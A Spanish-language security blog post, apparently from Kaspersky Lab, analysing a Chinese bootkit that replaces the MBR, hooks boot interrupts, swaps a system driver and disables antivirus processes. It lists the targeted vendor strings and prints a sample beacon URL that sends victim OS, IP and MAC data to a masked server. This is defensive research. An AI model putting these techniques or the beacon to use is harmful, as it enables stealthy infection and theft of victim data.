News

El bootkit chino

Hace poco descubrimos un nuevo bootkit, un programa malicioso que infecta el sector de arranque del disco duro. Kaspersky Lab lo detecta como Rookit.Win32.Fisp.a. Trojan-Downloader.NSIS.Agent.jd distribuye el bootkit. El troyano infecta los ordenadores de los usuarios que intentan descargar un clip de video de un sitio pornográfico falso de China.

Vale la pena recalcar que este troyano descargador (downloader) descarga otros programas maliciosos usando el motor NSIS y guarda todos los enlaces en el script NSIS respectivo.

Fragmento del script NSIS de Trojan-Downloader.NSIS.Agent.jd.

El dropper Rootkit.Win32.Fisp.a está entre los programas que descarga el troyano downloader. Este programa malicioso infecta el sector de arranque del disco duro. Específicamente, guarda el viejo MBR en el tercer sector y lo reemplaza con el suyo. Comenzando en el cuarto sector, instala un driver codificado y el código que falta.

Fragmento del inicio del disco duro infectado por Rootkit.Win32.Fisp.a.

El programa malicioso obtiene control del equipo tan pronto como se reinicia el ordenador infectado. Lo primero que hace es substituir la interrupción INT 13h modificando la tabla del vector de interrupción. Después el bootkit restaura el MBR original y continúa con el proceso de arranque normal.

Cuando se termina el arranque de una parte específica del sistema, el bootkit intercepta la función ExVerifySuite. El gancho instalado reemplaza el controlador del sistema fips.sys con el controlador malicioso escrito al inicio del disco duro en un formato codificado. Debemos recalcar que el sistema operativo no necesita el controlador fips.sys para funcionar bien, así que el sistema no colapsa cuando se lo reemplaza.

El controlador malicioso utiliza PsSetLoadImageNotifyRoutine para interceptar los procesos que se ejecutan. El gancho procesa el encabezamiento PE en la imagen que se carga viendo la sección “Seguridad” de la matriz “DataDirectory”. El controlador contiene una lista de cadenas (abajo) que se encuentran en los procesos de populares programas antivirus. Si cualquiera de estas cadenas se encuentra en un proceso, el controlador modifica el punto de entrada en la imagen cargada para que no pueda volver a funcionar con éxito.


Beike
Beijing Rising Information Technology
AVG Technologies
Trend Micro
BITDEFENDER LLC
Symantec Corporation
Kaspersky Lab
ESET, spol
Beijing Jiangmin
Kingsoft Software
360.cn
Keniu Network Technology (Beijing) Co
Qizhi Software (beijing) Co,

La función principal del controlador es penetrar en el proceso explorer.exe e inyectar una versión alternativa de Rootkit.Win32.Fisp.a que tiene funcionalidad de descargador. El programa malicioso envía una solicitud al servidor en la que comparte información sobre el sistema operativo de la víctima, su dirección IP, direcciones MAC, etc.

http://ab.*****.com:8081/tj.aspx?a=Windows XP Service Pack 2&b=192.168.0.16&c=00-00-00-00-00-00&f=none&g=none&k=a&h=62&i=2&j=0321-01

Ejemplo de la solicitud enviada al servidor.

Después, el programa malicioso descarga modificaciones de Trojan-Dropper.Win32.Vedio.dgs y Trojan-GameThief.Win32.OnLineGames.boas en el ordenador de su víctima.

La descripción de arriba se puede resumir en el siguiente diagrama:

Los productos Kaspersky Lab detectan y neutralizan Rootkit.Win32.Fisp.a.

Kaspersky Lab products successfully detect and neutralize Rootkit.Win32.Fisp.a.

El bootkit chino

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

 

Informes

MosaicRegressor: acechando en las sombras de UEFI

Encontramos una imagen de firmware de la UEFI infectada con un implante malicioso, es el objeto de esta investigación. Hasta donde sabemos, este es el segundo caso conocido en que se ha detectado un firmware malicioso de la UEFI usado por un actor de amenazas.

Dark Tequila Añejo

Dark Tequila es una compleja campaña maliciosa que tiene por objetivo a los usuarios ubicados en México, con el propósito principal de robar información financiera, así como credenciales de acceso a sitios populares que van desde versionado de código fuente a cuentas de almacenamiento de archivos en línea y de registro de dominios web.

De Shamoon a StoneDrill

A partir de noviembre de 2016, Kaspersky Lab observó una nueva ola de ataques de wipers dirigidos a múltiples objetivos en el Medio Oriente. El programa malicioso utilizado en los nuevos ataques era una variante del conocido Shamoon, un gusano que tenía como objetivo a Saudi Aramco y Rasgas en 2012.

Suscríbete a nuestros correos electrónicos semanales

Las investigaciones más recientes en tu bandeja de entrada